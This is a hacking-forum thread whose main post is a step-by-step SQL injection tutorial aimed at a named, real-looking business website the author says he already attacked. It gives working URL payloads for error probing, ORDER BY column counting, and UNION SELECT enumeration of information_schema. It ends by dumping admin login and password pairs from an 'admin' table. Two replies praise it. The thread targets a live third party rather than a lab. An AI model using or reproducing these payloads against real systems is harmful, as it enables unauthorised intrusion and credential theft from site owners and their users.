Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
[Website Hacking] SQL Injection
#1
Hello there Cyber Forums, today I'll be going over the steps of performing an SQL injection attack. I would like to state that I will be using a site I have already performed this attack on for the sake of this tutorial. I am not responsible for how you use what you have learned here, so let's get started.

The site I will be using: http://www.irwinhunter.com.au/

Step 1. The website
Okay so this website has been designed very poorly. It has a constant design color of green and some stupid navigation panel. It has multiple places such as "Products" and "Links". Overall this website is pretty shitty.

Step 2. Finding the vulnerability
Okay before we actually are able to do this attack we need to find a vulnerability.
To do this we will have to go to pages and click on other pages we find within the main page we clicked on, for this example I'll use "Products". After you are in the "Products" section just click on a product and then we can get into the fun part, I'll be using "Herbs" for this. After you chose your product group such as "Herbs" click on a product within the category and you will be taken to the page for that product. To notice if we have found a vulnerable page in the "Products" section look at the website URL, it should have something like
Code:
products.php?prodid=<number>

If it does then to find out if it is vulnerable we need to put a ' or a fucked up piece of math logic such as 1=0--
If done correctly the URL should look like
Code:
products.php?prodid=<number>' or 1=0--

If the site is vulnerable you should have an error like this.
Code:
Error performing query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1=0--' at line 1

Step 3. Exploiting the vulnerability
If you got this far you have obviously understood the first 2 steps, now let's move on. Once you have found your vulnerability we can now exploit it in order to get some info that we shouldn't be able to get. First let's start with getting the table names on the page by typing in the following into the website url.
Code:
products.php?prodid=<number> order by 20--

Now for this website it should have came up with an error that says,
Code:
Error performing query: Unknown column '20' in 'order clause'

if it does than we know our number is too big, so let's cut the number in half with 15 and put it into the URL.
Code:
products.php?prodid=<number> order by 15--

Once again we should get the same error but this time the number should be 15. We are now going to drop down 5 more times to 10, if done correctly it should be.
Code:
products.php?prodid=<number> order by 10--

We also get the same error just with the number 10, so why not drop to 5?
Code:
products.php?prodid=<number> order by 5--

Holy shit we no longer have an error!, but we still need to find the max number we can go at in order to do this attack properly. I suggest you increment the number by 1 until you can no longer can view the page and begin to get an error again.

Step 4. Finding the table names
If you have managed to follow all the steps properly you are now able to start getting the table and column names. For this section of the tutorial we will be covering how to get the table names first.

Okay so, to get the name of what is known as in the SQL syntax as a "table" we need to add some more lines of code into the URL bar. The code we will be adding needs to have what we currently have, deleted. After what we currently have we need to insert the following code.
Code:
products.php?prodid=-<number> union select 1,2,3,4,5,6,7--

If done correctly you should see a number on your screen, this shows what number is vulnerable and we can start attacking. If this was not done correctly and you still see words on the screen place a minus sign(-) in front of the product id.

Now to get the table names we need to format the URL string as followed.
Code:
products.php?prodid=-<number> union select 1,2,table_name,4,5,6,7 from information_schema.tables--

If done correctly you should see text such as.
Code:
CHARACTER_SETS

You may now scroll through the tables and see what you would like, I want to get admin login info so I will use the "admin" table I have found.

Step 5. Getting column names
Okay to get the names of what is known in the SQL syntax as a"column" all we need to do is go back to what we need in "Step 4" and just change it with this.
Code:
products.php?prodid=-<number> union select 1,2,column_name,4,5,6,7 from information_schema.columns--

Once this is done you may look through what you want and as I said, I wanted admin login. I will proceed to use the columns "login" and "password".

Step 6. Getting our login info
Okay now to get the login info that we wanted we need to make sure that we wrote down what the info was to get it, if we didn't we need to look again. Now since I wrote the info I needed down I now know that what I need to use is below.
Code:
login, password, admin

Now you may be wondering how do we use what we have obtained, well it's simple. Just follow my instructions and you will have admin info. To get the info we need to take the string we currently have which should be.
Code:
products.php?prodid=-<number> union select 1,2,column_name,4,5,6,7 from information_schema.columns

We need to replace "column_name" and "schema.columns" with "concat(login,0x3a,password" and "admin". Once this is done it should look like this.
Code:
products.php?prodid=-<number> union select 1,2,concat(login,0x3a,password),4,5,6,7 from admin--

If you did this correctly the username and password should show up and if so, this means you have followed this tutorial correctly and have done a SQL injection attack.

If you need any help with anything regarding this thread post below and I'll try to help you.

Also me nor the staff of Cyber Forums are responsible for how you use what you have learned from this tutorial AT ALL!
[Image: kgyWB27.gif]
Reply
#2
Nice, well written tutorial. Thanks man!
Reply
#3
Awsome Tutorial Looks awsome Keep it bro
Reply


Forum Jump:


Users browsing this thread: 1 Guest(s)